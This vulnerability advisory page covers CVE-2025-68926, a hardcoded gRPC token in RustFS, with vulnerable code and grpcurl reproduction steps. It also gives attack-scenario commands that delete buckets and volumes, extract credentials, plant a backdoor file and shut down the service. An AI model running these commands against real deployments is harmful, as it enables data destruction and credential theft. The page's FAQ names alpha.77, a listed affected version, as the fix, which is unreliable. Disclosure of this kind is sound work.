CVE-2025-68926: RustFS has a gRPC Hardcoded Token Authentication Bypass

Published Dec 30, 2025
·
Updated

Vulnerability Overview

Description

RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is: 1. Publicly exposed in the source code repository 2. Hardcoded on both client and server sides 3. Non-configurable with no mechanism for token rotation 4. Universally valid across all RustFS deployments

Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes.

CVSS 3.1 Score

Score: 9.8 (Critical) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

- Attack Vector (AV): Network - Exploitable remotely - Attack Complexity (AC): Low - No special conditions required - Privileges Required (PR): None - No authentication needed (bypassed) - User Interaction (UI): None - Fully automated exploitation - Scope (S): Unchanged - Impact contained to vulnerable component - Confidentiality (C): High - Complete data disclosure - Integrity (I): High - Complete data modification capability - Availability (A): High - Complete service disruption capability

---

Vulnerable Code Analysis

Server-Side Authentication (rustfs/src/server/http.rs:679-686)

rust #[allow(clippy::resultlargeerr)] fn checkauth(req: Request<()>) -> std::result::Result<Request<()>, Status> { let token: MetadataValue<> = "rustfs rpc".parse().unwrap(); // ⚠️ HARDCODED!

match req.metadata().get("authorization") { Some(t) if token == t => Ok(req), => Err(Status::unauthenticated("No valid auth token")), } }

Issues: - Static token hardcoded as string literal - No configuration mechanism (environment variable, file, etc.) - Token visible in public GitHub repository - Identical across all installations

Client-Side Authentication (crates/protos/src/lib.rs:153-174)

rust pub async fn nodeservicetimeoutclient( addr: &String, ) -> Result<NodeServiceClient<...>, Box<dyn Error>> { let token: MetadataValue<> = "rustfs rpc".parse()?; // ⚠️ SAME HARDCODED TOKEN!

// ...

Ok(NodeServiceClient::withinterceptor( channel, Box::new(move |mut req: Request<()>| { req.metadatamut().insert("authorization", token.clone()); Ok(req) }), )) }

Issues: - Client uses identical hardcoded token - No secure token distribution mechanism - Token cannot be rotated without code changes

Service Integration (rustfs/src/server/http.rs:520-521)

rust let rpcservice = NodeServiceServer::withinterceptor(makeserver(), checkauth); let service = hybrid(s3service, rpcservice);

The checkauth interceptor is applied to all gRPC services via NodeServiceServer::withinterceptor, protecting all 50+ gRPC methods in node.proto with the same weak authentication.

---

Reproduction Steps

Environment Setup

Test Environment: - RustFS Server: localhost:9000 (HTTP + gRPC hybrid service) - RustFS Console: localhost:9001 - Container: rustfs/rustfs:latest (Docker Compose deployment) - Default credentials: rustfsadmin/rustfsadmin

Tools Required: - grpcurl v1.9.3+ (gRPC command-line client) - RustFS proto files: crates/protos/src/node.proto

Step 1: Verify Authentication is Enforced

Test 1.1: Request without authentication token

bash $ grpcurl -plaintext \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 nodeservice.NodeService/Ping

Expected Result: ✅ Authentication failure

ERROR: Code: Unauthenticated Message: No valid auth token

Test 1.2: Request with incorrect token

bash $ grpcurl -plaintext \ -H 'authorization: wrong-token-12345' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 nodeservice.NodeService/Ping

Expected Result: ✅ Authentication failure

ERROR: Code: Unauthenticated Message: No valid auth token

Conclusion: Authentication is properly enforced - unauthorized requests are rejected.

---

Step 2: Extract Hardcoded Token from Source Code

Public Source Code Analysis:

bash $ git clone https://github.com/rustfs/rustfs.git $ cd rustfs $ grep -rn '"rustfs rpc"' --include='.rs'

Result: ✅ Token found in public source code

rustfs/src/server/http.rs:680: let token: MetadataValue<> = "rustfs rpc".parse().unwrap(); crates/protos/src/lib.rs:153: let token: MetadataValue<> = "rustfs rpc".parse()?;

Extracted Token: rustfs rpc

---

Step 3: Exploit - Authenticate Using Hardcoded Token

Test 3.1: Successful authentication with hardcoded token

bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 nodeservice.NodeService/Ping

Result: 🔓 AUTHENTICATION BYPASSED

json { "version": "1", "body": "DAAAAAAABgAIAAQABgAAAAQAAAANAAAAaGVsbG8sIGNhbGxlcgAAAA==" }

Analysis: Server accepted the hardcoded token and returned a successful response. Authentication completely bypassed.

---

Step 4: Demonstrate Access to Sensitive Management APIs

Test 4.1: Server Configuration Disclosure

bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 nodeservice.NodeService/ServerInfo

Result: ✅ Complete server configuration disclosed

json { "success": true, "serverProperties": "n6ZvbmxpbmWsMC4wLjAuMDo5MDAwoM0DhdkjMjAyNS0xMi0xOVQwNjo1NzoxOVpAMS4wLjAtYWxwaGEuNzaggawwLjAuMC4wOjkwMDCmb25saW5llNwAGq0vZGF0YS9ydXN0ZnMwwq0vZGF0YS9ydXN0ZnMwwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAANwAGq0vZGF0YS9ydXN0ZnMxwq0vZGF0YS9ydXN0ZnMxwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAdwAGq0vZGF0YS9ydXN0ZnMywq0vZGF0YS9ydXN0ZnMywsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAtwAGq0vZGF0YS9ydXN0ZnMzwq0vZGF0YS9ydXN0ZnMzwsKib2ugACLAzwAAcxuhUAAAzwAAQCnCIAAAzwAAMvHfMAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAywAAAAAAAAAAy0BL3vAPnWekwMDOADA+/c5/XK34wwAAAwGRAZUAAAAAAAAAoIA=" }

Analysis: - Server returned complete configuration including storage paths, endpoint addresses, version info - Binary data contains sensitive internal state (MessagePack encoded) - Information disclosure confirmed

Test 4.2: Disk Information Access

bash $ grpcurl -plaintext \ -H 'authorization: rustfs rpc' \ -import-path /private/tmp/rustfs/crates/protos/src \ -proto node.proto \ -d '{}' \ localhost:9000 nodeservice.NodeService/DiskInfo

Result: ✅ Authenticated request accepted (business logic error returned, not auth error)

json { "error": { "code": 36, "errorInfo": "io error can not find disk" } }

Analysis: - Request passed authentication (error is business logic, not authentication) - Proves attacker has authenticated access to sensitive system information APIs

---

Impact Analysis

Affected APIs

All 50+ gRPC methods in nodeservice.NodeService are vulnerable:

🔴 CRITICAL Impact - Data Destruction - DeleteBucket - Delete production buckets - DeleteVolume - Destroy entire storage volumes - DeleteUser - Remove legitimate users - DeletePolicy - Remove access control policies - DeleteServiceAccount - Remove service accounts

🔴 CRITICAL Impact - Configuration Manipulation - ReloadSiteReplicationConfig - Corrupt cluster replication - SignalService - Control service lifecycle - LoadPolicy - Modify access control policies - LoadPolicyMapping - Alter policy assignments

🟠 HIGH Impact - Unauthorized Data Access/Modification - ReadAll / ReadAt - Read arbitrary data - WriteAll / WriteStream - Inject malicious data - RenameFile / RenameData - Manipulate file system - UpdateMetadata / WriteMetadata - Corrupt metadata

🟠 HIGH Impact - Privilege Escalation - LoadUser - Access user credentials - LoadServiceAccount - Access service credentials - LoadGroup - Access group memberships

🟡 MEDIUM Impact - Information Disclosure - ServerInfo - Server configuration disclosure - DiskInfo - Storage configuration disclosure - GetMetrics - Performance metrics disclosure - GetBucketStats - Bucket statistics disclosure - LocalStorageInfo - Storage system information - ListBucket - Bucket enumeration

🟡 MEDIUM Impact - Cluster Operations - MakeBucket - Unauthorized bucket creation - HealBucket - Trigger repair operations - BackgroundHealStatus - Monitor internal operations

Attack Scenarios

Scenario 1: Data Destruction

bash Enumerate all buckets grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"options": "{}"}' \ localhost:9000 nodeservice.NodeService/ListBucket

Delete critical production bucket grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"bucket": "production-data"}' \ localhost:9000 nodeservice.NodeService/DeleteBucket

Delete entire storage volume grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"volume": "vol1"}' \ localhost:9000 nodeservice.NodeService/DeleteVolume

Impact: Complete data loss, business disruption

Scenario 2: Credential Harvesting

bash Extract user credentials grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"accesskey": "admin"}' \ localhost:9000 nodeservice.NodeService/LoadUser

Extract service account credentials grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"accesskey": "service-account"}' \ localhost:9000 nodeservice.NodeService/LoadServiceAccount

Exfiltrate IAM policies grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"name": "admin-policy"}' \ localhost:9000 nodeservice.NodeService/LoadPolicy

Impact: Complete IAM compromise, lateral movement

Scenario 3: Backdoor Installation

bash Inject malicious data into system paths grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"volume": "config", "path": "backdoor.sh", "buf": "..."}' \ localhost:9000 nodeservice.NodeService/WriteAll

Modify system configuration grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"bucket": "system", "path": ".rustfs.sys/config.json", "fi": "..."}' \ localhost:9000 nodeservice.NodeService/WriteMetadata

Impact: Persistent compromise, further exploitation

Scenario 4: Cluster Disruption

bash Corrupt replication configuration grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{}' \ localhost:9000 nodeservice.NodeService/ReloadSiteReplicationConfig

Force service restart/shutdown grpcurl -plaintext -H 'authorization: rustfs rpc' \ -d '{"sig": 2}' \ localhost:9000 nodeservice.NodeService/SignalService

Impact: Distributed system failure, data inconsistency

---

Exploitation Preconditions

Required Conditions

✅ All conditions typically met in production deployments:

1. Network Access: Attacker can reach gRPC port (9000/TCP) - RustFS binds to 0.0.0.0 by default (all interfaces) - Commonly exposed for distributed node communication

2. Token Knowledge: Token is publicly known - Available in public GitHub repository - Identical across all RustFS installations - Cannot be changed without code modification

3. No Additional Security Controls: - No mTLS/certificate-based authentication - No IP whitelisting (typically) - No VPN/network segmentation requirements - No rate limiting on authentication attempts

Attack Complexity

Complexity: 🟢 TRIVIAL

- Single grpcurl command with hardcoded token - No exploit development required - No timing or race conditions - No target-specific reconnaissance needed - Fully automatable - Works against any RustFS instance

Time to Exploit: < 1 minute

---

Security Impact

Confidentiality Impact: HIGH

- Complete Data Disclosure: All stored objects readable via ReadAll/ReadAt - Credential Exposure: IAM users, service accounts, policies accessible - Configuration Disclosure: Server, storage, cluster configuration leaked - Metrics Exposure: Performance and usage metrics accessible

Integrity Impact: HIGH

- Data Modification: Arbitrary data injection via WriteAll/WriteStream - Metadata Corruption: File metadata tampering via WriteMetadata - Policy Manipulation: IAM policies modifiable via LoadPolicy - Configuration Changes: Cluster replication config alterable

Availability Impact: HIGH

- Data Destruction: Buckets/volumes deletable via DeleteBucket/DeleteVolume - Service Disruption: Service controllable via SignalService - Cluster Degradation: Replication corruption via ReloadSiteReplicationConfig - Resource Exhaustion: Arbitrary data writes, bucket creation

---

Compliance & Regulatory Impact

Standards Violated

PCI-DSS v4.0 - Requirement 6.5.3: Broken authentication - Requirement 8.2: Strong authentication required - Requirement 8.6: Multi-factor authentication required

OWASP Top 10 2021 - A07:2021 - Identification and Authentication Failures - Use of hard-coded credentials - Missing or ineffective authentication

CWE (Common Weakness Enumeration) - CWE-798: Use of Hard-coded Credentials (Rank: 37/400) - CWE-1391: Use of Weak Credentials - CWE-287: Improper Authentication

NIST Cybersecurity Framework - PR.AC-1: Access control mechanisms violated - PR.AC-7: Authentication mechanisms insufficient

SOC 2 Type II - CC6.1: Logical access controls inadequate - CC6.6: Credential management controls missing

Legal & Business Impact

- Data Breach Notification: GDPR Art. 33, CCPA §1798.150 - Regulatory Fines: GDPR up to €20M or 4% annual revenue - Customer Trust: Severe reputational damage - Service Disruption: SLA violations, customer compensation - Incident Response Costs: Forensics, remediation, legal fees

---

Proof of Concept

Automated POC Script

File: auditanalysis/poccve2025008grpctokenworking.sh

Usage: bash chmod +x poccve2025008grpctokenworking.sh ./poccve2025008grpctokenworking.sh [targethost:port]

Default Target: localhost:9000

POC Features

1. ✅ Baseline Authentication Testing - Verifies unauthenticated requests are rejected - Verifies incorrect tokens are rejected

2. ✅ Exploit Demonstration - Authenticates using hardcoded token - Calls Ping service successfully

3. ✅ Sensitive API Access - Accesses ServerInfo (configuration disclosure) - Accesses DiskInfo (system information) - Demonstrates authenticated access to management APIs

4. ✅ Detailed Reporting - Displays vulnerable code locations - Lists all affected APIs (50+ methods) - Provides CVSS scoring and impact analysis - Includes remediation recommendations

POC Output Summary

[PHASE 1] Baseline Testing ✓ Without token: REJECTED (Unauthenticated) ✓ With wrong token: REJECTED (Unauthenticated)

[PHASE 2] Exploit ✓ With hardcoded token "rustfs rpc": ACCEPTED ✅

[PHASE 3] Sensitive API Access ✓ ServerInfo: SUCCESS - Configuration disclosed ✓ DiskInfo: SUCCESS - System information accessible

[RESULT] VULNERABILITY CONFIRMED

Acknowledgements

We would like to thank bilisheep from the Xmirror Security Team for discovering and responsibly reporting this vulnerability.

Other sources

RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.78, RustFS implements gRPC authentication using a hardcoded static token "rustfs rpc" that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.78 contains a fix for the issue.

MITRE

Affected Software

79 affected componentsFixes available
RustFS RustFS<1.0.0-alpha.77
rust/rustfs>=1.0.0-alpha.13<=1.0.0-alpha.77
1.0.0-alpha.78
RustFS Rustfs Rust=1.0.0-alpha1
RustFS Rustfs Rust=1.0.0-alpha10
RustFS Rustfs Rust=1.0.0-alpha11
RustFS Rustfs Rust=1.0.0-alpha12
RustFS Rustfs Rust=1.0.0-alpha13
RustFS Rustfs Rust=1.0.0-alpha14
RustFS Rustfs Rust=1.0.0-alpha15
RustFS Rustfs Rust=1.0.0-alpha16
RustFS Rustfs Rust=1.0.0-alpha17
RustFS Rustfs Rust=1.0.0-alpha18
RustFS Rustfs Rust=1.0.0-alpha19
RustFS Rustfs Rust=1.0.0-alpha2
RustFS Rustfs Rust=1.0.0-alpha20
RustFS Rustfs Rust=1.0.0-alpha21
RustFS Rustfs Rust=1.0.0-alpha22
RustFS Rustfs Rust=1.0.0-alpha23
RustFS Rustfs Rust=1.0.0-alpha24
RustFS Rustfs Rust=1.0.0-alpha25
RustFS Rustfs Rust=1.0.0-alpha26
RustFS Rustfs Rust=1.0.0-alpha27
RustFS Rustfs Rust=1.0.0-alpha28
RustFS Rustfs Rust=1.0.0-alpha29
RustFS Rustfs Rust=1.0.0-alpha3
RustFS Rustfs Rust=1.0.0-alpha30
RustFS Rustfs Rust=1.0.0-alpha31
RustFS Rustfs Rust=1.0.0-alpha32
RustFS Rustfs Rust=1.0.0-alpha33
RustFS Rustfs Rust=1.0.0-alpha34
RustFS Rustfs Rust=1.0.0-alpha35
RustFS Rustfs Rust=1.0.0-alpha36
RustFS Rustfs Rust=1.0.0-alpha37
RustFS Rustfs Rust=1.0.0-alpha38
RustFS Rustfs Rust=1.0.0-alpha39
RustFS Rustfs Rust=1.0.0-alpha4
RustFS Rustfs Rust=1.0.0-alpha40
RustFS Rustfs Rust=1.0.0-alpha41
RustFS Rustfs Rust=1.0.0-alpha42
RustFS Rustfs Rust=1.0.0-alpha43
RustFS Rustfs Rust=1.0.0-alpha44
RustFS Rustfs Rust=1.0.0-alpha45
RustFS Rustfs Rust=1.0.0-alpha46
RustFS Rustfs Rust=1.0.0-alpha47
RustFS Rustfs Rust=1.0.0-alpha48
RustFS Rustfs Rust=1.0.0-alpha49
RustFS Rustfs Rust=1.0.0-alpha5
RustFS Rustfs Rust=1.0.0-alpha50
RustFS Rustfs Rust=1.0.0-alpha51
RustFS Rustfs Rust=1.0.0-alpha52
RustFS Rustfs Rust=1.0.0-alpha53
RustFS Rustfs Rust=1.0.0-alpha54
RustFS Rustfs Rust=1.0.0-alpha55
RustFS Rustfs Rust=1.0.0-alpha56
RustFS Rustfs Rust=1.0.0-alpha57
RustFS Rustfs Rust=1.0.0-alpha58
RustFS Rustfs Rust=1.0.0-alpha59
RustFS Rustfs Rust=1.0.0-alpha6
RustFS Rustfs Rust=1.0.0-alpha60
RustFS Rustfs Rust=1.0.0-alpha61
RustFS Rustfs Rust=1.0.0-alpha62
RustFS Rustfs Rust=1.0.0-alpha63
RustFS Rustfs Rust=1.0.0-alpha64
RustFS Rustfs Rust=1.0.0-alpha65
RustFS Rustfs Rust=1.0.0-alpha66
RustFS Rustfs Rust=1.0.0-alpha67
RustFS Rustfs Rust=1.0.0-alpha68
RustFS Rustfs Rust=1.0.0-alpha69
RustFS Rustfs Rust=1.0.0-alpha7
RustFS Rustfs Rust=1.0.0-alpha70
RustFS Rustfs Rust=1.0.0-alpha71
RustFS Rustfs Rust=1.0.0-alpha72
RustFS Rustfs Rust=1.0.0-alpha73
RustFS Rustfs Rust=1.0.0-alpha74
RustFS Rustfs Rust=1.0.0-alpha75
RustFS Rustfs Rust=1.0.0-alpha76
RustFS Rustfs Rust=1.0.0-alpha77
RustFS Rustfs Rust=1.0.0-alpha8
RustFS Rustfs Rust=1.0.0-alpha9

Event History

Dec 30, 2025
CVE Published
via MITRE·04:59 PM
Data Sourced
via MITRE·04:59 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:15 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:15 PM
Affected Software
Advisory Published
via GitHub·11:06 PM
Data Sourced
via GitHub·11:06 PM
DescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2025-68926?

CVE-2025-68926 is considered a high-severity vulnerability due to the exposure of a hardcoded static authentication token.

2

How do I fix CVE-2025-68926?

To fix CVE-2025-68926, upgrade to RustFS version 1.0.0-alpha.77 or later to eliminate the hardcoded token.

3

What is the main impact of CVE-2025-68926?

The main impact of CVE-2025-68926 is that unauthorized users could potentially gain access to the RustFS system using the exposed authentication token.

4

Which versions of RustFS are affected by CVE-2025-68926?

RustFS versions prior to 1.0.0-alpha.77 are affected by CVE-2025-68926 due to the hardcoded authentication token.

5

Is CVE-2025-68926 open to exploitation?

Yes, CVE-2025-68926 is open to exploitation since the static token is hardcoded and publicly accessible in the source code.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203